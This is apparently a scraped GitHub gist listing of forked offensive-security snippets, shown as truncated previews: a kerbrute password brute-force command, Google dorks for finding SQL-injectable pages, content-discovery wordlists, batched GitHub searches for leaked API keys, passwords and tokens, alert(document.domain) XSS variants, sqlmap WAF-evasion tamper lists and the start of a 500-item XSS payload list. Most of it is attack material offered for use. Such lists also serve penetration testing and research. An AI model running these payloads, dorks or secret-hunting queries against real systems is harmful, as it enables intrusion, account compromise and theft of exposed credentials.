With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>With Rubeus version with brute module:
ar35 affilares
affilares
/ sql_dork_list
Created
August 9, 2019 10:17
— forked from mokiding/sql_dork_list
Google SQL dork list
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| trainers.php?id= | |
| play_old.php?id= | |
| declaration_more.php?decl_id= | |
| Pageid= | |
| games.php?id= | |
| newsDetail.php?id= | |
| staff_id= | |
| historialeer.php?num= | |
| product-item.php?id= | |
| news_view.php?id= |
affilares
/ content_discovery_nullenc0de.txt
Created
August 10, 2019 05:24
— forked from nullenc0de/content_discovery_nullenc0de.txt
content_discovery_nullenc0de.txt
This file has been truncated, but you can view the full file.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| / | |
| $$$lang-translate.service.js.aspx | |
| $367-Million-Merger-Blocked.html | |
| $defaultnav | |
| ${idfwbonavigation}.xml | |
| $_news.php | |
| $search2 | |
| £º | |
| .0 | |
| /0 |
affilares
/ auto_git_query
Created
August 29, 2019 08:53
— forked from nullenc0de/auto_git_query
Automated Github Queries (Can open 29 tabs at a time)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| https://github.com/search?q=BROWSER_STACK_ACCESS_KEY= OR BROWSER_STACK_USERNAME= OR browserConnectionEnabled= OR BROWSERSTACK_ACCESS_KEY=&s=indexed&type=Code | |
| https://github.com/search?q=CHROME_CLIENT_SECRET= OR CHROME_EXTENSION_ID= OR CHROME_REFRESH_TOKEN= OR CI_DEPLOY_PASSWORD= OR CI_DEPLOY_USER=&s=indexed&type=Code | |
| https://github.com/search?q=CLOUDAMQP_URL= OR CLOUDANT_APPLIANCE_DATABASE= OR CLOUDANT_ARCHIVED_DATABASE= OR CLOUDANT_AUDITED_DATABASE=&s=indexed&type=Code | |
| https://github.com/search?q=CLOUDANT_ORDER_DATABASE= OR CLOUDANT_PARSED_DATABASE= OR CLOUDANT_PASSWORD= OR CLOUDANT_PROCESSED_DATABASE=&s=indexed&type=Code | |
| https://github.com/search?q=CONTENTFUL_PHP_MANAGEMENT_TEST_TOKEN= OR CONTENTFUL_TEST_ORG_CMA_TOKEN= OR CONTENTFUL_V2_ACCESS_TOKEN=&s=indexed&type=Code | |
| https://github.com/search?q=-DSELION_BROWSER_RUN_HEADLESS= OR -DSELION_DOWNLOAD_DEPENDENCIES= OR -DSELION_SELENIUM_RUN_LOCALLY=&s=indexed&type=Code | |
| https://github.com/search?q=ELASTICSEARCH_PASSWORD= OR ELASTICSEARCH_USERNAME= OR EMAIL_NOTIFI |
affilares
/ auto_git_query_fav
Created
August 29, 2019 08:54
— forked from nullenc0de/auto_git_query_fav
Auto_git Favs
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| https://github.com/search?q=\?AccessKeyId= OR _02ddd67d5586_key= OR 0HB_CODESIGN_GPG_PASS= OR 0HB_CODESIGN_KEY_PASS=&s=indexed&type=Code | |
| https://github.com/search?q=0VIRUSTOTAL_APIKEY= OR ACCESS KEY ID = OR ACCESS_KEY_ID= OR ACCESS_KEY_SECRET= OR ACCESS_KEY=&s=indexed&type=Code | |
| https://github.com/search?q=ACCESS_SECRET= OR ACCESSKEY= OR ACCESSKEYID= OR ADZERK_API_KEY= OR ALGOLIA_ADMIN_KEY_1=&s=indexed&type=Code | |
| https://github.com/search?q=ALGOLIA_ADMIN_KEY_2= OR ALGOLIA_ADMIN_KEY_MCM= OR ALGOLIA_API_KEY_MCM= OR ALGOLIA_API_KEY_SEARCH=&s=indexed&type=Code | |
| https://github.com/search?q=ALGOLIA_API_KEY= OR ALGOLIA_SEARCH_API_KEY= OR ALGOLIA_SEARCH_KEY_1= OR ALGOLIA_SEARCH_KEY=&s=indexed&type=Code | |
| https://github.com/search?q=ALIAS_PASS= OR ALICLOUD_ACCESS_KEY= OR ALICLOUD_SECRET_KEY= OR AMAZON_SECRET_ACCESS_KEY=&s=indexed&type=Code | |
| https://github.com/search?q=ANSIBLE_VAULT_PASSWORD= OR aos_key= OR API_KEY_MCM= OR API_KEY_SECRET= OR API_KEY_SID= OR API_KEY=&s=indexed&type=Code | |
| https://github.com/search?q=API_SECRE |
affilares
/ params.txt
Created
August 29, 2019 08:56
— forked from nullenc0de/params.txt
List of parameters for content discovery
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 0 | |
| 1 | |
| 11 | |
| 12 | |
| 13 | |
| 14 | |
| 15 | |
| 16 | |
| 17 | |
| 2 |
affilares
/ kerberos_attacks_cheatsheet.md
Created
August 29, 2019 12:04
— forked from TarlogicSecurity/kerberos_attacks_cheatsheet.md
A cheatsheet with commands that can be used to perform kerberos attacks
affilares
/ alert.js
Created
August 29, 2019 12:14
— forked from tomnomnom/alert.js
Ways to alert(document.domain)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // How many ways can you alert(document.domain)? | |
| // Comment with more ways and I'll add them :) | |
| // I already know about the JSFuck way, but it's too long to add (: | |
| // Direct invocation | |
| alert(document.domain); | |
| (alert)(document.domain); | |
| al\u0065rt(document.domain); | |
| al\u{65}rt(document.domain); | |
| window['alert'](document.domain); |
affilares
/ linkfinder-oneliner.sh
Created
September 3, 2019 03:53
— forked from ntrzz/linkfinder-oneliner.sh
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| curl -s $1 | grep -Eo "(http|https)://[a-zA-Z0-9./?=_-]*" | sort | uniq | grep ".js" > jslinks.txt; while IFS= read link; do python linkfinder.py -i "$link" -o cli; done < jslinks.txt | grep $2 | grep -v $3 | sort -n | uniq; rm -rf jslinks.txt |
affilares
/ sqlmap tamper scripts
Created
September 6, 2019 08:11
— forked from sapran/sqlmap tamper scripts
sqlmap tamper scripts grouped by DBMS Copied from: https://prakash-khadka.com.np/wp-content/uploads/pdf/www-moonsec-com.pdf
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # All scripts | |
| ``` | |
| --tamper=apostrophemask,apostrophenullencode,appendnullbyte,base64encode,between,bluecoat,chardoubleencode,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,randomcomments,securesphere,space2comment,space2dash,space2hash,space2morehash,space2mssqlblank,space2mssqlhash,space2mysqlblank,space2mysqldash,space2plus,space2randomblank,sp_password,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords | |
| ``` | |
| # General scripts | |
| ``` | |
| --tamper=apostrophemask,apostrophenullencode,base64encode,between,chardoubleencode,charencode,charunicodeencode,equaltolike,greatest,ifnull2ifisnull,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2plus,space2randomblank,unionalltounion,unmagicquotes | |
| ``` | |
| # Microsoft access | |
| ``` |
affilares
/ xss-top500.txt
Created
September 9, 2019 11:15
— forked from phra/xss-top500.txt
#500 XSS payloads - https://gbhackers.com/top-500-important-xss-cheat-sheet/
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <body oninput=javascript:alert(1)><input autofocus> | |
| <math href="javascript:javascript:alert(1)">CLICKME</math> <math> <maction actiontype="statusline#http://google.com" xlink:href="javascript:javascript:alert(1)">CLICKME</maction> </math> | |
| <frameset onload=javascript:alert(1)> | |
| <table background="javascript:javascript:alert(1)"> | |
| <!--<img src="--><img src=x onerror=javascript:alert(1)//"> | |
| <comment><img src="</comment><img src=x onerror=javascript:alert(1))//"> | |
| <![><img src="]><img src=x onerror=javascript:alert(1)//"> | |
| <style><img src="</style><img src=x onerror=javascript:alert(1)//"> | |
| <li style=list-style:url() onerror=javascript:alert(1)> <div style=content:url(data:image/svg+xml,%%3Csvg/%%3E);visibility:hidden onload=javascript:alert(1)></div> | |
| <head><base href="javascript://"></head><body><a href="/. /,javascript:alert(1)//#">XXX</a></body> |
OlderNewer